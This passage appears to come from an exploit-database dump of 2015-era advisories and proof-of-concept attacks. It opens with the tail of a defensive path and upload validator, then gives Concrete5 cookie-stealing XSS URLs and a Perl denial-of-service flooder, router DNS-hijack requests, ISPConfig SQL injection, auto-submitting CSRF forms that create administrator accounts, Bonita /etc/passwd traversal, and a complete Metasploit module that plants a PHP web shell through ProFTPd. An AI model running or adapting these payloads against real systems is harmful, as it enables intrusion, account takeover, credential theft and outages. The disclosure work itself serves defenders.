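    Returns the normalized absolute path, or None if it would leave root.
    """
    decoded = unquote(unquote(requested))          # catches %2e%2e and %252e%252e
    decoded = decoded.replace("\\", "/")           # treat backslashes as separators
    root = posixpath.normpath(root)
    # Resolve relative to root even when the client supplies a leading slash.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def allowed_upload(filename, allowed_exts):
    """Reduce an upload's filename to a safe basename, or return None to reject it.

    Drops any directory part (so '/../../tmp/example.txt' becomes 'example.txt'),
    requires exactly one extension from the allowlist and a plain stem, which
    also refuses names such as 'shell.php;.gif' or '.htaccess'.
    """
    name = posixpath.basename(unquote(filename).replace("\\", "/"))
    if name.count(".") != 1:
        return None
    stem, ext = name.split(".")
    ext = ext.lower()
    if not SAFE_STEM.match(stem) or ext not in allowed_exts:
        return None
    return f"{stem}.{ext}"


if __name__ == "__main__":
    root = "/var/mobile/Applications/WiFiHD/Documents"   # assumed export directory
    for path in ("/../../../../../../../../etc/passwd", "../../", "/photos/IMG_0001.jpg"):
        print(repr(path), "->", resolve_under_root(root, path))
    for name in ("0wned.asp", "Inj3ct0r.php;.gif", "photo.JPG"):
        print(repr(name), "->", allowed_upload(name, {"gif", "jpg", "png"}))
```

The path check is lexical: it rejects the eight `../` hops in the PoCs, percent- and double-percent-encoded dots, and backslashes, but it does not follow symlinks, so on a real filesystem call os.path.realpath on the result and compare against the root again before opening anything. The upload check refuses `0wned.asp` from the Acuity request above and the `Inj3ct0r.php;.gif` style double extension used against Concrete5 later on this page.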
-
Concrete CMS < 5.5.21 - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/53640/info

Concrete CMS is prone to the following vulnerabilities because it fails to properly handle user-supplied input:
1. Multiple cross-site scripting vulnerabilities
2. An arbitrary-file-upload vulnerability
3. A denial-of-service vulnerability

An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Concrete CMS versions 5.5 and 5.5.21 are vulnerable.

Cross Site Scripting:

1) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode="><script>alert(1);</script>

2) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID="><script>alert(document.cookie);</script>&searchInstance=file1337335625

3) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="><script>alert(document.cookie);</script>

3A) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123&searchInstance="><script>alert(1);</script>
    www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance="><script>alert(1);</script>

4) (onmouseover event) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=" onmouseover="alert(1)"&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=

4A) (without onmouseover event) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance="><script>alert(1);</script>&fKeywords=zssds&fsID[]=-1&numResults=10&searchField=&selectedSearchField[]=

5) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="><script>alert(1);</script>

6) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/edit?searchInstance=');</script><script>alert(document.cookie);</script>&fID=7
    (fID must be a valid image ID)

7) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/add_to?searchInstance="><script>alert(document.cookie);</script>&fID=owned

8) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/replace?searchInstance="><script>alert(document.cookie);</script>&fID=4

9) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="><script>alert(document.cookie);</script>
    (fID[] must be a valid image ID)

10) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/permissions?searchInstance="><script>alert("AkaStep");</script>&fID=owned

11) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id="><script>alert(1);</script>&node=owned&display_mode=full&select_mode=&selectedPageID=

11A) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node="><script>alert(1);</script>&display_mode=full&select_mode=&selectedPageID=

11B) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode="><script>alert(1);</script>&select_mode=&selectedPageID=

11C) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode=owned&selectedPageID="><script>alert(1);</script>

11D) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/dashboard/sitemap_data.php?instance_id=owned&node=owned&display_mode=owned&select_mode="><script>alert(1);</script>&selectedPageID=owned

(All parameters of sitemap_data.php go into the page source without any sanitization or validation.)

12) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID="><script>alert(1);</script>&search=1

13) http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="><script>alert(document.cookie);</script>

Shell upload:

#### p0c 1 [ Upload File via FlashUploader ] ###==>
http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf

# Upload File/Shell Inj3ct0r.php;.gif

DOS:

#### p0c 2 [ DDos with RPC 'using simple PERL script]===>

#!/usr/bin/perl
use Socket;

if (@ARGV < 2) { &usage }

$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;

# $i is decremented, so $i<66 never becomes false: the loop runs until the process is killed
for ($i=0; $i<66; $i--) {
    $user="w00t".$rand.$i;
    $data = "Aa" ;
    $lenx = length $data;
    $rpc = "POST ".$dir."concrete/js/tiny_mce/plugins/spellchecker/rpc.php HTTP/1.1\r\n". # Or use just /index.php
           "Accept: */*\r\n".
           "Content-Type: application/x-www-form-urlencoded\r\n".
           "Accept-Encoding: gzip, deflate\r\n".
           "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
           "Host: $host\r\n".
           "Content-Length: $lenx\r\n".
           "Connection: Keep-Alive\r\n".
           "Cache-Control: no-cache\r\n\r\n".
           "$data";
    my $port = "80";
    my $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
    send(SOCKET,"$rpc", 0);
    syswrite STDOUT, "+" ;
}
print "\n\n";
system("ping $host");

sub usage {
    print "\tusage: \n";
    print "\t$0 <host> </dir/>\n";
    print "\tEx: $0 127.0.0.1 /concrete/\n";
    print "\tEx2: $0 target.com /\n\n";
    exit();
};
# << ThE|End
-
Concrete5 CMS FlashUploader - Arbitrary '.SWF' File Upload
source: https://www.securityfocus.com/bid/53640/info

Concrete CMS is prone to the following vulnerabilities because it fails to properly handle user-supplied input:
1. Multiple cross-site scripting vulnerabilities
2. An arbitrary-file-upload vulnerability
3. A denial-of-service vulnerability

An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Concrete CMS versions 5.5 and 5.5.21 are vulnerable.

http://www.example.com/concrete/flash/thumbnail_editor_2.swf
http://www.example.com/concrete/flash/thumbnail_editor_3.swf
http://www.example.com/concrete/flash/swfupload/swfupload.swf
http://www.example.com/concrete/flash/uploader/uploader.swf
-
D-Link DSL-2780B DLink_1.01.14 - Remote DNS Change
D-Link DSL-2780B DLink_1.01.14 Unauthenticated Remote DNS Change
Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg

No description for morons, script kiddies & noobs !!

Disclaimer: This and previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk!

[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1
-
ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities
Advisory ID: HTB23260
Product: ISPConfig
Vendor: http://www.ispconfig.org
Vulnerable Version(s): 3.0.5.4p6 and probably prior
Tested Version: 3.0.5.4p6
Advisory Publication: May 20, 2015 [without technical details]
Vendor Notification: May 20, 2015
Vendor Patch: June 4, 2015
Public Disclosure: June 10, 2015
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-4118, CVE-2015-4119
Risk Level: High
CVSSv2 Base Scores: 5.8 (AV:N/AC:L/Au:M/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular hosting control panel ISPConfig. The vulnerabilities can be exploited to execute arbitrary SQL commands in the application database, perform a CSRF attack and gain complete control over the web application.

1) SQL Injection in ISPConfig: CVE-2015-4118

The vulnerability exists due to insufficient filtration of input data passed via the "server" HTTP GET parameter to the "/monitor/show_sys_state.php" script before executing a SQL query. A remote authenticated attacker can pass arbitrary SQL commands to the vulnerable script and execute them in the application's database.

Successful exploitation of this vulnerability will allow an attacker to read, insert and modify arbitrary records in the database and compromise the entire web application, but requires the attacker to be authenticated and to have "monitor" privileges. However, in combination with the CSRF vulnerability to which the application is also vulnerable, this vulnerability becomes exploitable by a remote non-authenticated attacker.

A simple exploit below will display the MySQL server version.

First, use the following HTTP request to execute the SQL query:

https://[host]/monitor/show_sys_state.php?state=server&server=-1%20UNION%20SELECT%201,version%28%29%20--%202|-

After that visit the page mentioned below; the result of the MySQL 'version()' function will be displayed in the HTML code of the page:

https://[host]/monitor/show_data.php?type=mem_usage

2) CSRF (Cross-Site Request Forgery) in ISPConfig: CVE-2015-4119

The vulnerability exists due to failure in the "/admin/users_edit.php" script to properly verify the origin of the HTTP request. A remote attacker can create a specially crafted web page with a CSRF exploit, trick a logged-in administrator into visiting this page and create a new user with administrative privileges.

A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "immuniweb":

<form action = "https://[host]/admin/users_edit.php" method = "POST" enctype = "multipart/form-data">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="passwort" value="immuniweb">
<input type="hidden" name="repeat_password" value="immuniweb">
<input type="hidden" name="modules[]" value="vm">
<input type="hidden" name="modules[]" value="mail">
<input type="hidden" name="modules[]" value="help">
<input type="hidden" name="modules[]" value="monitor">
<input type="hidden" name="startmodule" value="vm">
<input type="hidden" name="app_theme[]" value="default">
<input type="hidden" name="typ[]" value="admin">
<input type="hidden" name="active" value="1">
<input type="hidden" name="language" value="en">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>

-----------------------------------------------------------------------------------------------

Solution:

Update to ISPConfig 3.0.5.4p7

More Information:
http://bugtracker.ispconfig.org/index.php?do=details&task_id=3898

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23260 - https://www.htbridge.com/advisory/HTB23260 - Multiple vulnerabilities in ISPConfig.
[2] ISPConfig - http://www.ispconfig.org - Hosting Control Panel Software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
-
TP-Link TD-W8950ND ADSL2+ - Remote DNS Change
TP-Link ADSL2+ TD-W8950ND Unauthenticated Remote DNS Change

Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg

No description for morons, script kiddies & noobs !!

Disclaimer:
This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (data loss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk!

[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
-
Bonita BPM 6.5.1 - Multiple Vulnerabilities
Advisory ID: HTB23259
Product: Bonita BPM
Vendor: Bonitasoft
Vulnerable Version(s): 6.5.1 and probably prior
Tested Version: 6.5.1 (Windows and Mac OS packages)
Advisory Publication: May 7, 2015 [without technical details]
Vendor Notification: May 7, 2015
Vendor Patch: June 9, 2015
Public Disclosure: June 10, 2015
Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601]
CVE References: CVE-2015-3897, CVE-2015-3898
Risk Level: High
CVSSv2 Base Scores: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in Bonita BPM Portal (Bonita's web interface, running by default on port 8080), which can be exploited by a remote non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted.

1) Path Traversal in Bonita BPM Portal: CVE-2015-3897

User-supplied input passed via the "theme" and "location" HTTP GET parameters to the "bonita/portal/themeResource" URL is not properly verified before being used as part of a file name. The attacker may download any system file accessible to the web server user.

Simple PoC code below will return the content of the "C:/Windows/system.ini" file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini

The second PoC will disclose the content of the "/etc/passwd" file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd

2) Open Redirect in Bonita BPM Portal: CVE-2015-3898

Input passed via the "redirectUrl" HTTP GET parameter to the "/bonita/login.jsp" script and "/bonita/loginservice" URLs is not properly verified before being used as a redirect URL. After login the user may be redirected to an arbitrary website:

http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/

-----------------------------------------------------------------------------------------------

Solution:

Update to Bonita BPM 6.5.3

More Information:
http://community.bonitasoft.com/blog/bonita-bpm-653-available

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM.
[2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
-
Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery
Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface.

Details
=======

Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, 6860
Affected Versions: All Releases:
  AOS 6.4.5.R02
  AOS 6.4.6.R01
  AOS 6.6.4.R01
  AOS 6.6.5.R02
  AOS 7.3.2.R01
  AOS 7.3.3.R01
  AOS 7.3.4.R01
  AOS 8.1.1.R01
Fixed Versions: -
Vulnerability Type: Cross-site request forgery
Security Risk: medium
Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004
Advisory Status: published
CVE: CVE-2015-2805
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805

Introduction
============

"The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable LAN Switches are the latest value stackable switches in the OmniSwitch family of products. The OmniSwitch 6450 was specifically built for versatility offering optional upgrade paths for 10 Gigabit stacking, 10 Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and Metro Ethernet services."
(from the vendor's homepage)

More Details
============

The management web interface of the OmniSwitch 6450 can be accessed using a web browser via HTTP. The web interface allows creating new user accounts; in this case an HTTP request like the following is sent to the switch:

POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1
Host: 192.0.2.1
[...]
Cookie: session=sess_15739
Content-Type: application/x-www-form-urlencoded
Content-Length: 214

EmWeb_ns:mip:2.T1:I1=attacker
&EmWeb_ns:mip:244.T1:O1=secret
&EmWeb_ns:mip:246.T1:O2=-1
&EmWeb_ns:mip:248.T1:O3=
&EmWeb_ns:mip:249.T1:O4=1
&EmWeb_ns:mip:250.T1:O5=4

This request creates a user "attacker" with the password "secret". All other parameters are static. All POST parameters can be predicted by attackers. This means that requests of this form can be prepared by attackers and sent from any web page the user visits in the same browser. If the user is authenticated to the switch, a valid session cookie is included in the request automatically, and the action is performed.

In order to activate the new user for the web interface it is necessary to enable the respective access privileges in the user's profile. This can also be done via the web interface. Then the HTTP POST request looks like the following:

POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1
Host: 192.0.2.1
[...]
Cookie: session=sess_15739
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

EmWeb_ns:mip:2.T1:I1=attacker
&EmWeb_ns:mip:4.T1:O1=
&EmWeb_ns:mip:5.T1:O2=
&EmWeb_ns:mip:6.T1:O3=4294967295
&EmWeb_ns:mip:7.T1:O4=4294967295

This request sets all access privileges for the user "attacker" and is again completely predictable.

Proof of Concept
================

Visiting the following HTML page will create a new user via the switch's management web interface, if the user is authenticated at the switch:

------------------------------------------------------------------------
<html>
<head>
<title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title>
</head>
<body>
<form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html" method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" />
</form>
<script>
document.getElementById("CSRF").submit();
</script>
</body>
</html>
------------------------------------------------------------------------

Workaround
==========

Disable the web interface by executing the following commands:

AOS6:
no ip service http
no ip service secure-http

AOS 7/8:
ip service http admin-state disable

If this is not possible, use a dedicated browser or browser profile for managing the switch via the web interface.

Fix
===

Upgrade the firmware to a fixed version. According to the vendor, the fixed versions will be available at the end of July 2015.

Security Risk
=============

If attackers trick a logged-in administrator into visiting an attacker-controlled web page, the attacker can perform actions and reconfigure the switch. In this situation an attacker can create an additional user account on the switch for future access. While a successful attack results in full access to the switch, the attack is hard to exploit because attackers need to know the IP address of the switch and get an administrative user to access an attacker-controlled web page. The vulnerability is therefore rated as a medium risk.

Timeline
========

2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                     Tel.: +49 241 510081-0
Dennewartstr. 25-27                         Fax : +49 241 510081-99
52068 Aachen                                https://www.redteam-pentesting.de
Germany

Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
-
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
        This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
        Any unauthenticated client can leverage these commands to copy files from any
        part of the filesystem to a chosen destination. The copy commands are executed
        with the rights of the ProFTPD service, which by default runs under the
        privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP
        payload to the website directory, PHP remote code execution is made possible.
      },
      'Author'         =>
        [
          'Vadim Melihow',                   # Original discovery, Proof of Concept
          'xistence <xistence[at]0x90.nl>'   # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-3306' ],
          [ 'EDB', '36742' ]
        ],
      'Privileged'     => false,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'BadChars' => '',
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic gawk bash python perl'
            }
        },
      'Targets'        =>
        [
          [ 'ProFTPD 1.3.5', { } ]
        ],
      'DisclosureDate' => 'Apr 22 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'HTTP port', 80]),
        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
        OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
        OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
      ], self.class)
  end

  def check
    ftp_port = datastore['RPORT_FTP']
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    sock.puts("SITE CPFR /etc/passwd\r\n")
    res = sock.get_once(-1, 10)
    if res && res.include?('350')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    ftp_port = datastore['RPORT_FTP']
    get_arg = rand_text_alphanumeric(5+rand(3))
    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'

    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")

    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
    end

    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
    end

    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
    end

    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
    end

    sock.close

    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
    res = send_request_cgi!(
      'uri'      => normalize_uri(target_uri.path, payload_name),
      'method'   => 'GET',
      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
    )

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
    end
  end
end
-
WordPress Plugin Encrypted Contact Form 1.0.4 - Cross-Site Request Forgery
# Title: CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4
# Submitter: Nitin Venkatesh
# Product: Encrypted Contact Form Wordpress Plugin
# Product URL: https://wordpress.org/plugins/encrypted-contact-form/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site Scripting [CWE-79]
# Affected Versions: v1.0.4 and possibly below.
# Tested versions: v1.0.4
# Fixed Version: v1.1
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1125443/
# Changelog: https://wordpress.org/plugins/encrypted-contact-form/changelog/
# CVE Status: CVE-2015-4010

## Product Information:

Secure contact form for WordPress. Uses end-to-end encryption to send user information. Not even your hosting provider can view the content. Let users send you information in a secure way. Uses I.CX messaging service to encrypt user content in their own web browsers before sending to you.

## Vulnerability Description:

The forms in the admin area of the plugin are vulnerable to CSRF, via which the contact forms generated are susceptible to XSS via an unsanitized POST parameter. For example, the admin function of updating an existing form can be done via CSRF. Hence, by submitting a crafted HTML string in the parameters via CSRF, an XSS attack gets launched which affects all the visitors of the page(s) containing the contact form.

## Proof of Concept:

<form action="http://localhost/wp-admin/options-general.php?page=conformconf" method="post">
<input type="hidden" name="name" value="required" />
<input type="hidden" name="email" value="optional" />
<input type="hidden" name="phone" value="off" />
<input type="hidden" name="message" value="required" />
<input type="hidden" name="display_name" value="Example" />
<input type="hidden" name="recipient_name" value="example" />
<input type="hidden" name="cfc_page_name" value="" />
<!-- Wordpress page-id value -->
<input type="hidden" name="existing_page" value="28" />
<input type="hidden" name="cfc_selection" value="upd" />
<input type="hidden" name="iframe_url" value="&quot;></iframe><script>alert('XSS!');</script>" />
<input type="submit" value="Update Page">
</form>

## Solution:

Upgrade to v1.1 of the plugin.

## Disclosure Timeline:

2015-03-26 - Discovered. Contacted developer on support forums.
2015-03-27 - Contacted developer via contact form on vendor site.
2015-04-01 - Fixed v1.1 released.
2015-05-15 - Published disclosure on FD.
2015-05-16 - CVE assigned

## References:

CVE Assign - http://seclists.org/oss-sec/2015/q2/471
http://packetstormsecurity.com/files/131955/
https://wpvulndb.com/vulnerabilities/7992

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.
-
AnimaGallery 2.6 - Local File Inclusion
# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability
# Date: 2015/06/07
# Vendor Homepage: http://dg.no.sapo.pt/
